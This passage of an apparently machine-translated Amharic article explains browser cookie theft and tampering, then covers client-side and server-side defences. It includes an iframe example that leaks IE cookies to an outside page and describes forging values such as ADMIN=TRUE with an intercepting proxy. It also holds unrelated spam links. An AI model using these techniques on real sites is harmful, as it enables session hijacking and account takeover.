</p><p>ኩኪዎችን ከተጠቃሚው ሃርድ ድራይቭ ላይ "የሚጠልፍ" እና ለpeacefire.org ድረ-ገጽ ኦፕሬተሮች የሚያስተላልፍ ስውር ኢሜይል ሊፈጠር ይችላል። ይህንን ለማድረግ በምሳሌው ላይ እንደሚታየው የዚህን መስቀለኛ መንገድ ማገናኛ ብዙ ጊዜ ማስቀመጥ ያስፈልግዎታል. ከPeacefire የመጡ ሰዎች ቆንጆ ሰዎች ቢመስሉም ሚስጥራዊ መረጃ በእጃቸው ከገባ ማንም ሰው አይወደውም ማለት አይቻልም።</p> <h3>የመከላከያ እርምጃዎች</h3> <p>ማዘመኛውን ይጫኑ፣ በ http://www.microsoft.com/technet/security/bulletin/ms00-033.asp ላይ ሊገኝ ይችላል። እንዲሁም ፕሮግራሙን መጠቀም ይችላሉ <b>ኩኪ ፓል</b>ወይም ከላይ እንደተገለፀው የኢንተርኔት ኤክስፕሎረር አብሮገነብ ችሎታዎች።</p> <p>ምስሉ የሚያሳየው ኩኪው የ wordpress_logged_in_263d663a02379b7624b1028a58464038=አስተዳዳሪን እንደያዘ ነው። ይህ ዋጋ በኩኪ ውስጥ ባልተመሰጠረ መልኩ ነው እና የ Achilles መገልገያን በመጠቀም ለመጥለፍ ቀላል ነው, ነገር ግን እንደ አንድ ደንብ, በአብዛኛዎቹ ሁኔታዎች, በአክሌስ ውስጥ የአንድ የተወሰነ ግቤት ሃሽ ብቻ ይታያል. ጥያቄን ወደ አገልጋዩ ከመላክዎ በፊት ፣ ይህንን ሕብረቁምፊ በማንኛውም ተመሳሳይ በሆነ ለመተካት መሞከር ይችላሉ (ምንም እንኳን በዚህ ጉዳይ ላይ ምንም ትርጉም የለውም) - የሙከራዎች ብዛት አይገደብም። ከዚያ ይህን ጥያቄ ወደ አገልጋዩ የላክ ቁልፍን በመጠቀም በመላክ ለአስተዳዳሪው ተብሎ ከአገልጋዩ ምላሽ ማግኘት ይችላሉ ።</p> <i> </i> <p>በቀደመው ምሳሌ፣ ቀጥተኛ የተጠቃሚ መታወቂያ ማፈንገጥ መጠቀም ይችላሉ። በተጨማሪም፣ የእሴቱ ምትክ ለሰርጎ ገቦች ተጨማሪ እድሎችን የሚሰጥ መለኪያው ስም የሚከተለው ሊሆን ይችላል፡ ተጠቃሚ (ለምሳሌ USER=JDOE)፣ የመታወቂያ ሕብረቁምፊ ያለው ማንኛውም አገላለጽ (ለምሳሌ USER=JDOE ወይም SESSIONID=BLAHBLAH) ፣ አስተዳዳሪ (ለምሳሌ ፣ ADMIN= TRUE) ፣ ክፍለ ጊዜ (ለምሳሌ ፣ SESSION=አክቲቭ) ፣ ጋሪ (ለምሳሌ ፣ CART=FULL) እና እንደ TRUE፣ FALSE፣ Active፣ InACTIVE ያሉ አባባሎች። በተለምዶ የኩኪዎች ቅርፀት በሚጠቀሙበት መተግበሪያ ላይ በጣም ጥገኛ ነው. ሆኖም፣ እነዚህ ከኩኪዎች ጋር የመተግበሪያ ጉድለቶችን ለማግኘት የሚረዱ ምክሮች ለሁሉም ቅርጸቶች ማለት ይቻላል ይሰራሉ።</p> <h2><span><b>በደንበኛው በኩል ከተከናወኑ ኩኪዎች መረጃን ለማውጣት የሚደረጉ የመከላከያ እርምጃዎች</b> </span></h2> <p>በአጠቃላይ ተጠቃሚው ስሱ መረጃዎችን ለማረጋገጥ እና ለማከማቸት ኩኪዎችን ከሚጠቀሙ ድረ-ገጾች መጠንቀቅ አለበት። እንዲሁም ለማረጋገጫ ኩኪዎችን የሚጠቀም ድረ-ገጽ የተጠቃሚ ስም እና የይለፍ ቃል ለማመሳጠር ቢያንስ የኤስኤስኤል ፕሮቶኮልን መደገፍ እንዳለበት ማስታወስ አለብዎት ምክንያቱም ይህ ፕሮቶኮል በሌለበት ጊዜ ውሂቡ ባልተመሰጠረ መልኩ ስለሚተላለፍ እንዲጠለፉ ያስችላቸዋል። በአውታረ መረቡ ላይ የተላከውን መረጃ ለማየት ቀላል የሶፍትዌር መሳሪያዎችን በመጠቀም።</p> <p>Kookaburra ሶፍትዌር የኩኪዎችን አጠቃቀም ለማመቻቸት መሳሪያ አዘጋጅቷል። መሣሪያው ኩኪፓል ይባላል ( <span>http://www.kburra.com/cpal.html (www.kburra.com ይመልከቱ)</span>). <a href="https://x360ce.ru/am/photo-printers/utrennyaya-zaryadka-olga-sagai-gibkoe-telo-programma-gibkoe-telo-dannyi-klass/">ይህ ፕሮግራም</a>አንድ ድረ-ገጽ በማሽን ላይ ኩኪን ለመጫን ሲሞክር ለተጠቃሚው ለማስጠንቀቅ የታለመ ነው፣ እና ተጠቃሚው ይህንን እርምጃ ለመፍቀድ ወይም ለመከልከል መምረጥ ይችላል። <a href="https://x360ce.ru/am/processing/chto-takoe-funkciya-knock-code-funkciya-podobnaya-knock-code-ot-lg-teper/">ተመሳሳይ ባህሪያት</a>ኩኪዎችን ማገድ አሁን በሁሉም አሳሾች ውስጥ ይገኛል።</p> <p>የድረ-ገጽ ማሻሻያዎችን አዘውትሮ ለመጫን ሌላው ምክንያት በእነዚህ ፕሮግራሞች ውስጥ በየጊዜው የሚታወቁት የደህንነት ጉድለቶች ናቸው. ለምሳሌ፣ ቤኔት ሃሴልተን እና ጄሚ ማካርቲ ሊንክ ሲጫኑ ኩኪዎችን ከደንበኛ ማሽን የሚያወጣ ስክሪፕት ፈጠሩ። በዚህ ምክንያት በተጠቃሚው ማሽን ላይ ያሉት ሁሉም የኩኪዎች ይዘቶች ይገኛሉ።</p> <p>እንደዚህ አይነት ጠለፋም በገላጭው ሊከናወን ይችላል። <IFRAME>, ኩኪዎችን ለመስረቅ በኤችቲኤምኤል ጽሑፍ ውስጥ በድረ-ገጽ (ወይም በኢሜል ወይም የዜና ቡድን ጋዜጣ በኤችቲኤምኤል ይዘት) ውስጥ የተካተተ። የሚከተለውን ምሳሌ ተመልከት።</p> <table><tr><td class="code"> <iframe src=”http://www.peacefire.org%2fsecurity%2fiecookies%2f showcookie.html%3f.yahoo.com/”>

እንደዚህ ያሉ ነገሮች የእኛን የግል መረጃ እንዳያስፈራሩ እኔ ራሴ አደርገዋለሁ እና ሁሉም ሰው ከኤችቲኤምኤል ኮድ (ኢሜል ደንበኞች ፣ ሚዲያ ማጫወቻዎች ፣ አሳሾች ፣ ወዘተ) ጋር የሚሰራ ሶፍትዌር ሁል ጊዜ እንዲያዘምን እመክራለሁ።

ብዙ ሰዎች በቀላሉ ኩኪዎችን ማገድ ይመርጣሉ፣ ሆኖም፣ አብዛኛዎቹ ድረ-ገጾች ማሰስ እንዲችሉ ኩኪዎችን ይፈልጋሉ። ማጠቃለያ - በቅርብ ጊዜ ውስጥ ያለ ኩኪዎች እንዲሰሩ የሚያስችልዎ አዲስ ቴክኖሎጂ ካለ ፣ ፕሮግራመሮች እና አስተዳዳሪዎች እፎይታ ይተነፍሳሉ ፣ ግን አሁን ኩኪዎች ለጠላፊው ጣፋጭ ምግብ ሆነው ይቆያሉ! ይህ እውነት ነው, ምክንያቱም የተሻለ አማራጭ እስካሁን የለም.

የአገልጋይ የጎን እርምጃዎች

የአገልጋይ ደህንነት ምክሮችን በተመለከተ ባለሙያዎች አንድ ቀላል ምክር ይሰጣሉ-በጣም አስፈላጊ ካልሆነ በስተቀር የኩኪውን ዘዴ አይጠቀሙ! ክፍለ-ጊዜው ካለቀ በኋላ በተጠቃሚው ስርዓት ላይ የሚቀሩ ኩኪዎችን ሲጠቀሙ ልዩ ጥንቃቄ መደረግ አለበት።

እርግጥ ነው፣ ኩኪዎችን ለተጠቃሚዎች ፍቃድ ለመስጠት የድር አገልጋዮችን ደህንነት ለመጠበቅ ጥቅም ላይ ሊውል እንደሚችል መረዳት አስፈላጊ ነው። እያዘጋጁት ያለው መተግበሪያ ኩኪዎችን መጠቀም የሚያስፈልገው ከሆነ እያንዳንዱ ክፍለ ጊዜ የተለያዩ ቁልፎችን በአጭር የአገልግሎት ጊዜ እንዲጠቀም ይህ ዘዴ መዋቀር አለበት እና እንዲሁም በእነዚህ ፋይሎች ውስጥ ሰርጎ ገቦች ለጠለፋ ሊጠቀሙበት የሚችሉትን መረጃ ላለማስቀመጥ ይሞክሩ ( እንደ ADMIN=TRUE)።

በተጨማሪም፣ ከኩኪዎች ጋር ሲሰሩ ለበለጠ ደህንነት፣ ሚስጥራዊነት ያለው መረጃ እንዳይወጣ ለመከላከል ምስጠራን መጠቀም ይችላሉ። እርግጥ ነው, ምስጠራ ሁሉንም የደህንነት ችግሮችን በኩኪ ቴክኖሎጂ አይፈታም, ነገር ግን ይህ ዘዴ ከላይ የተገለጹትን በጣም ቀላል የሆኑ ጠለፋዎችን ይከላከላል.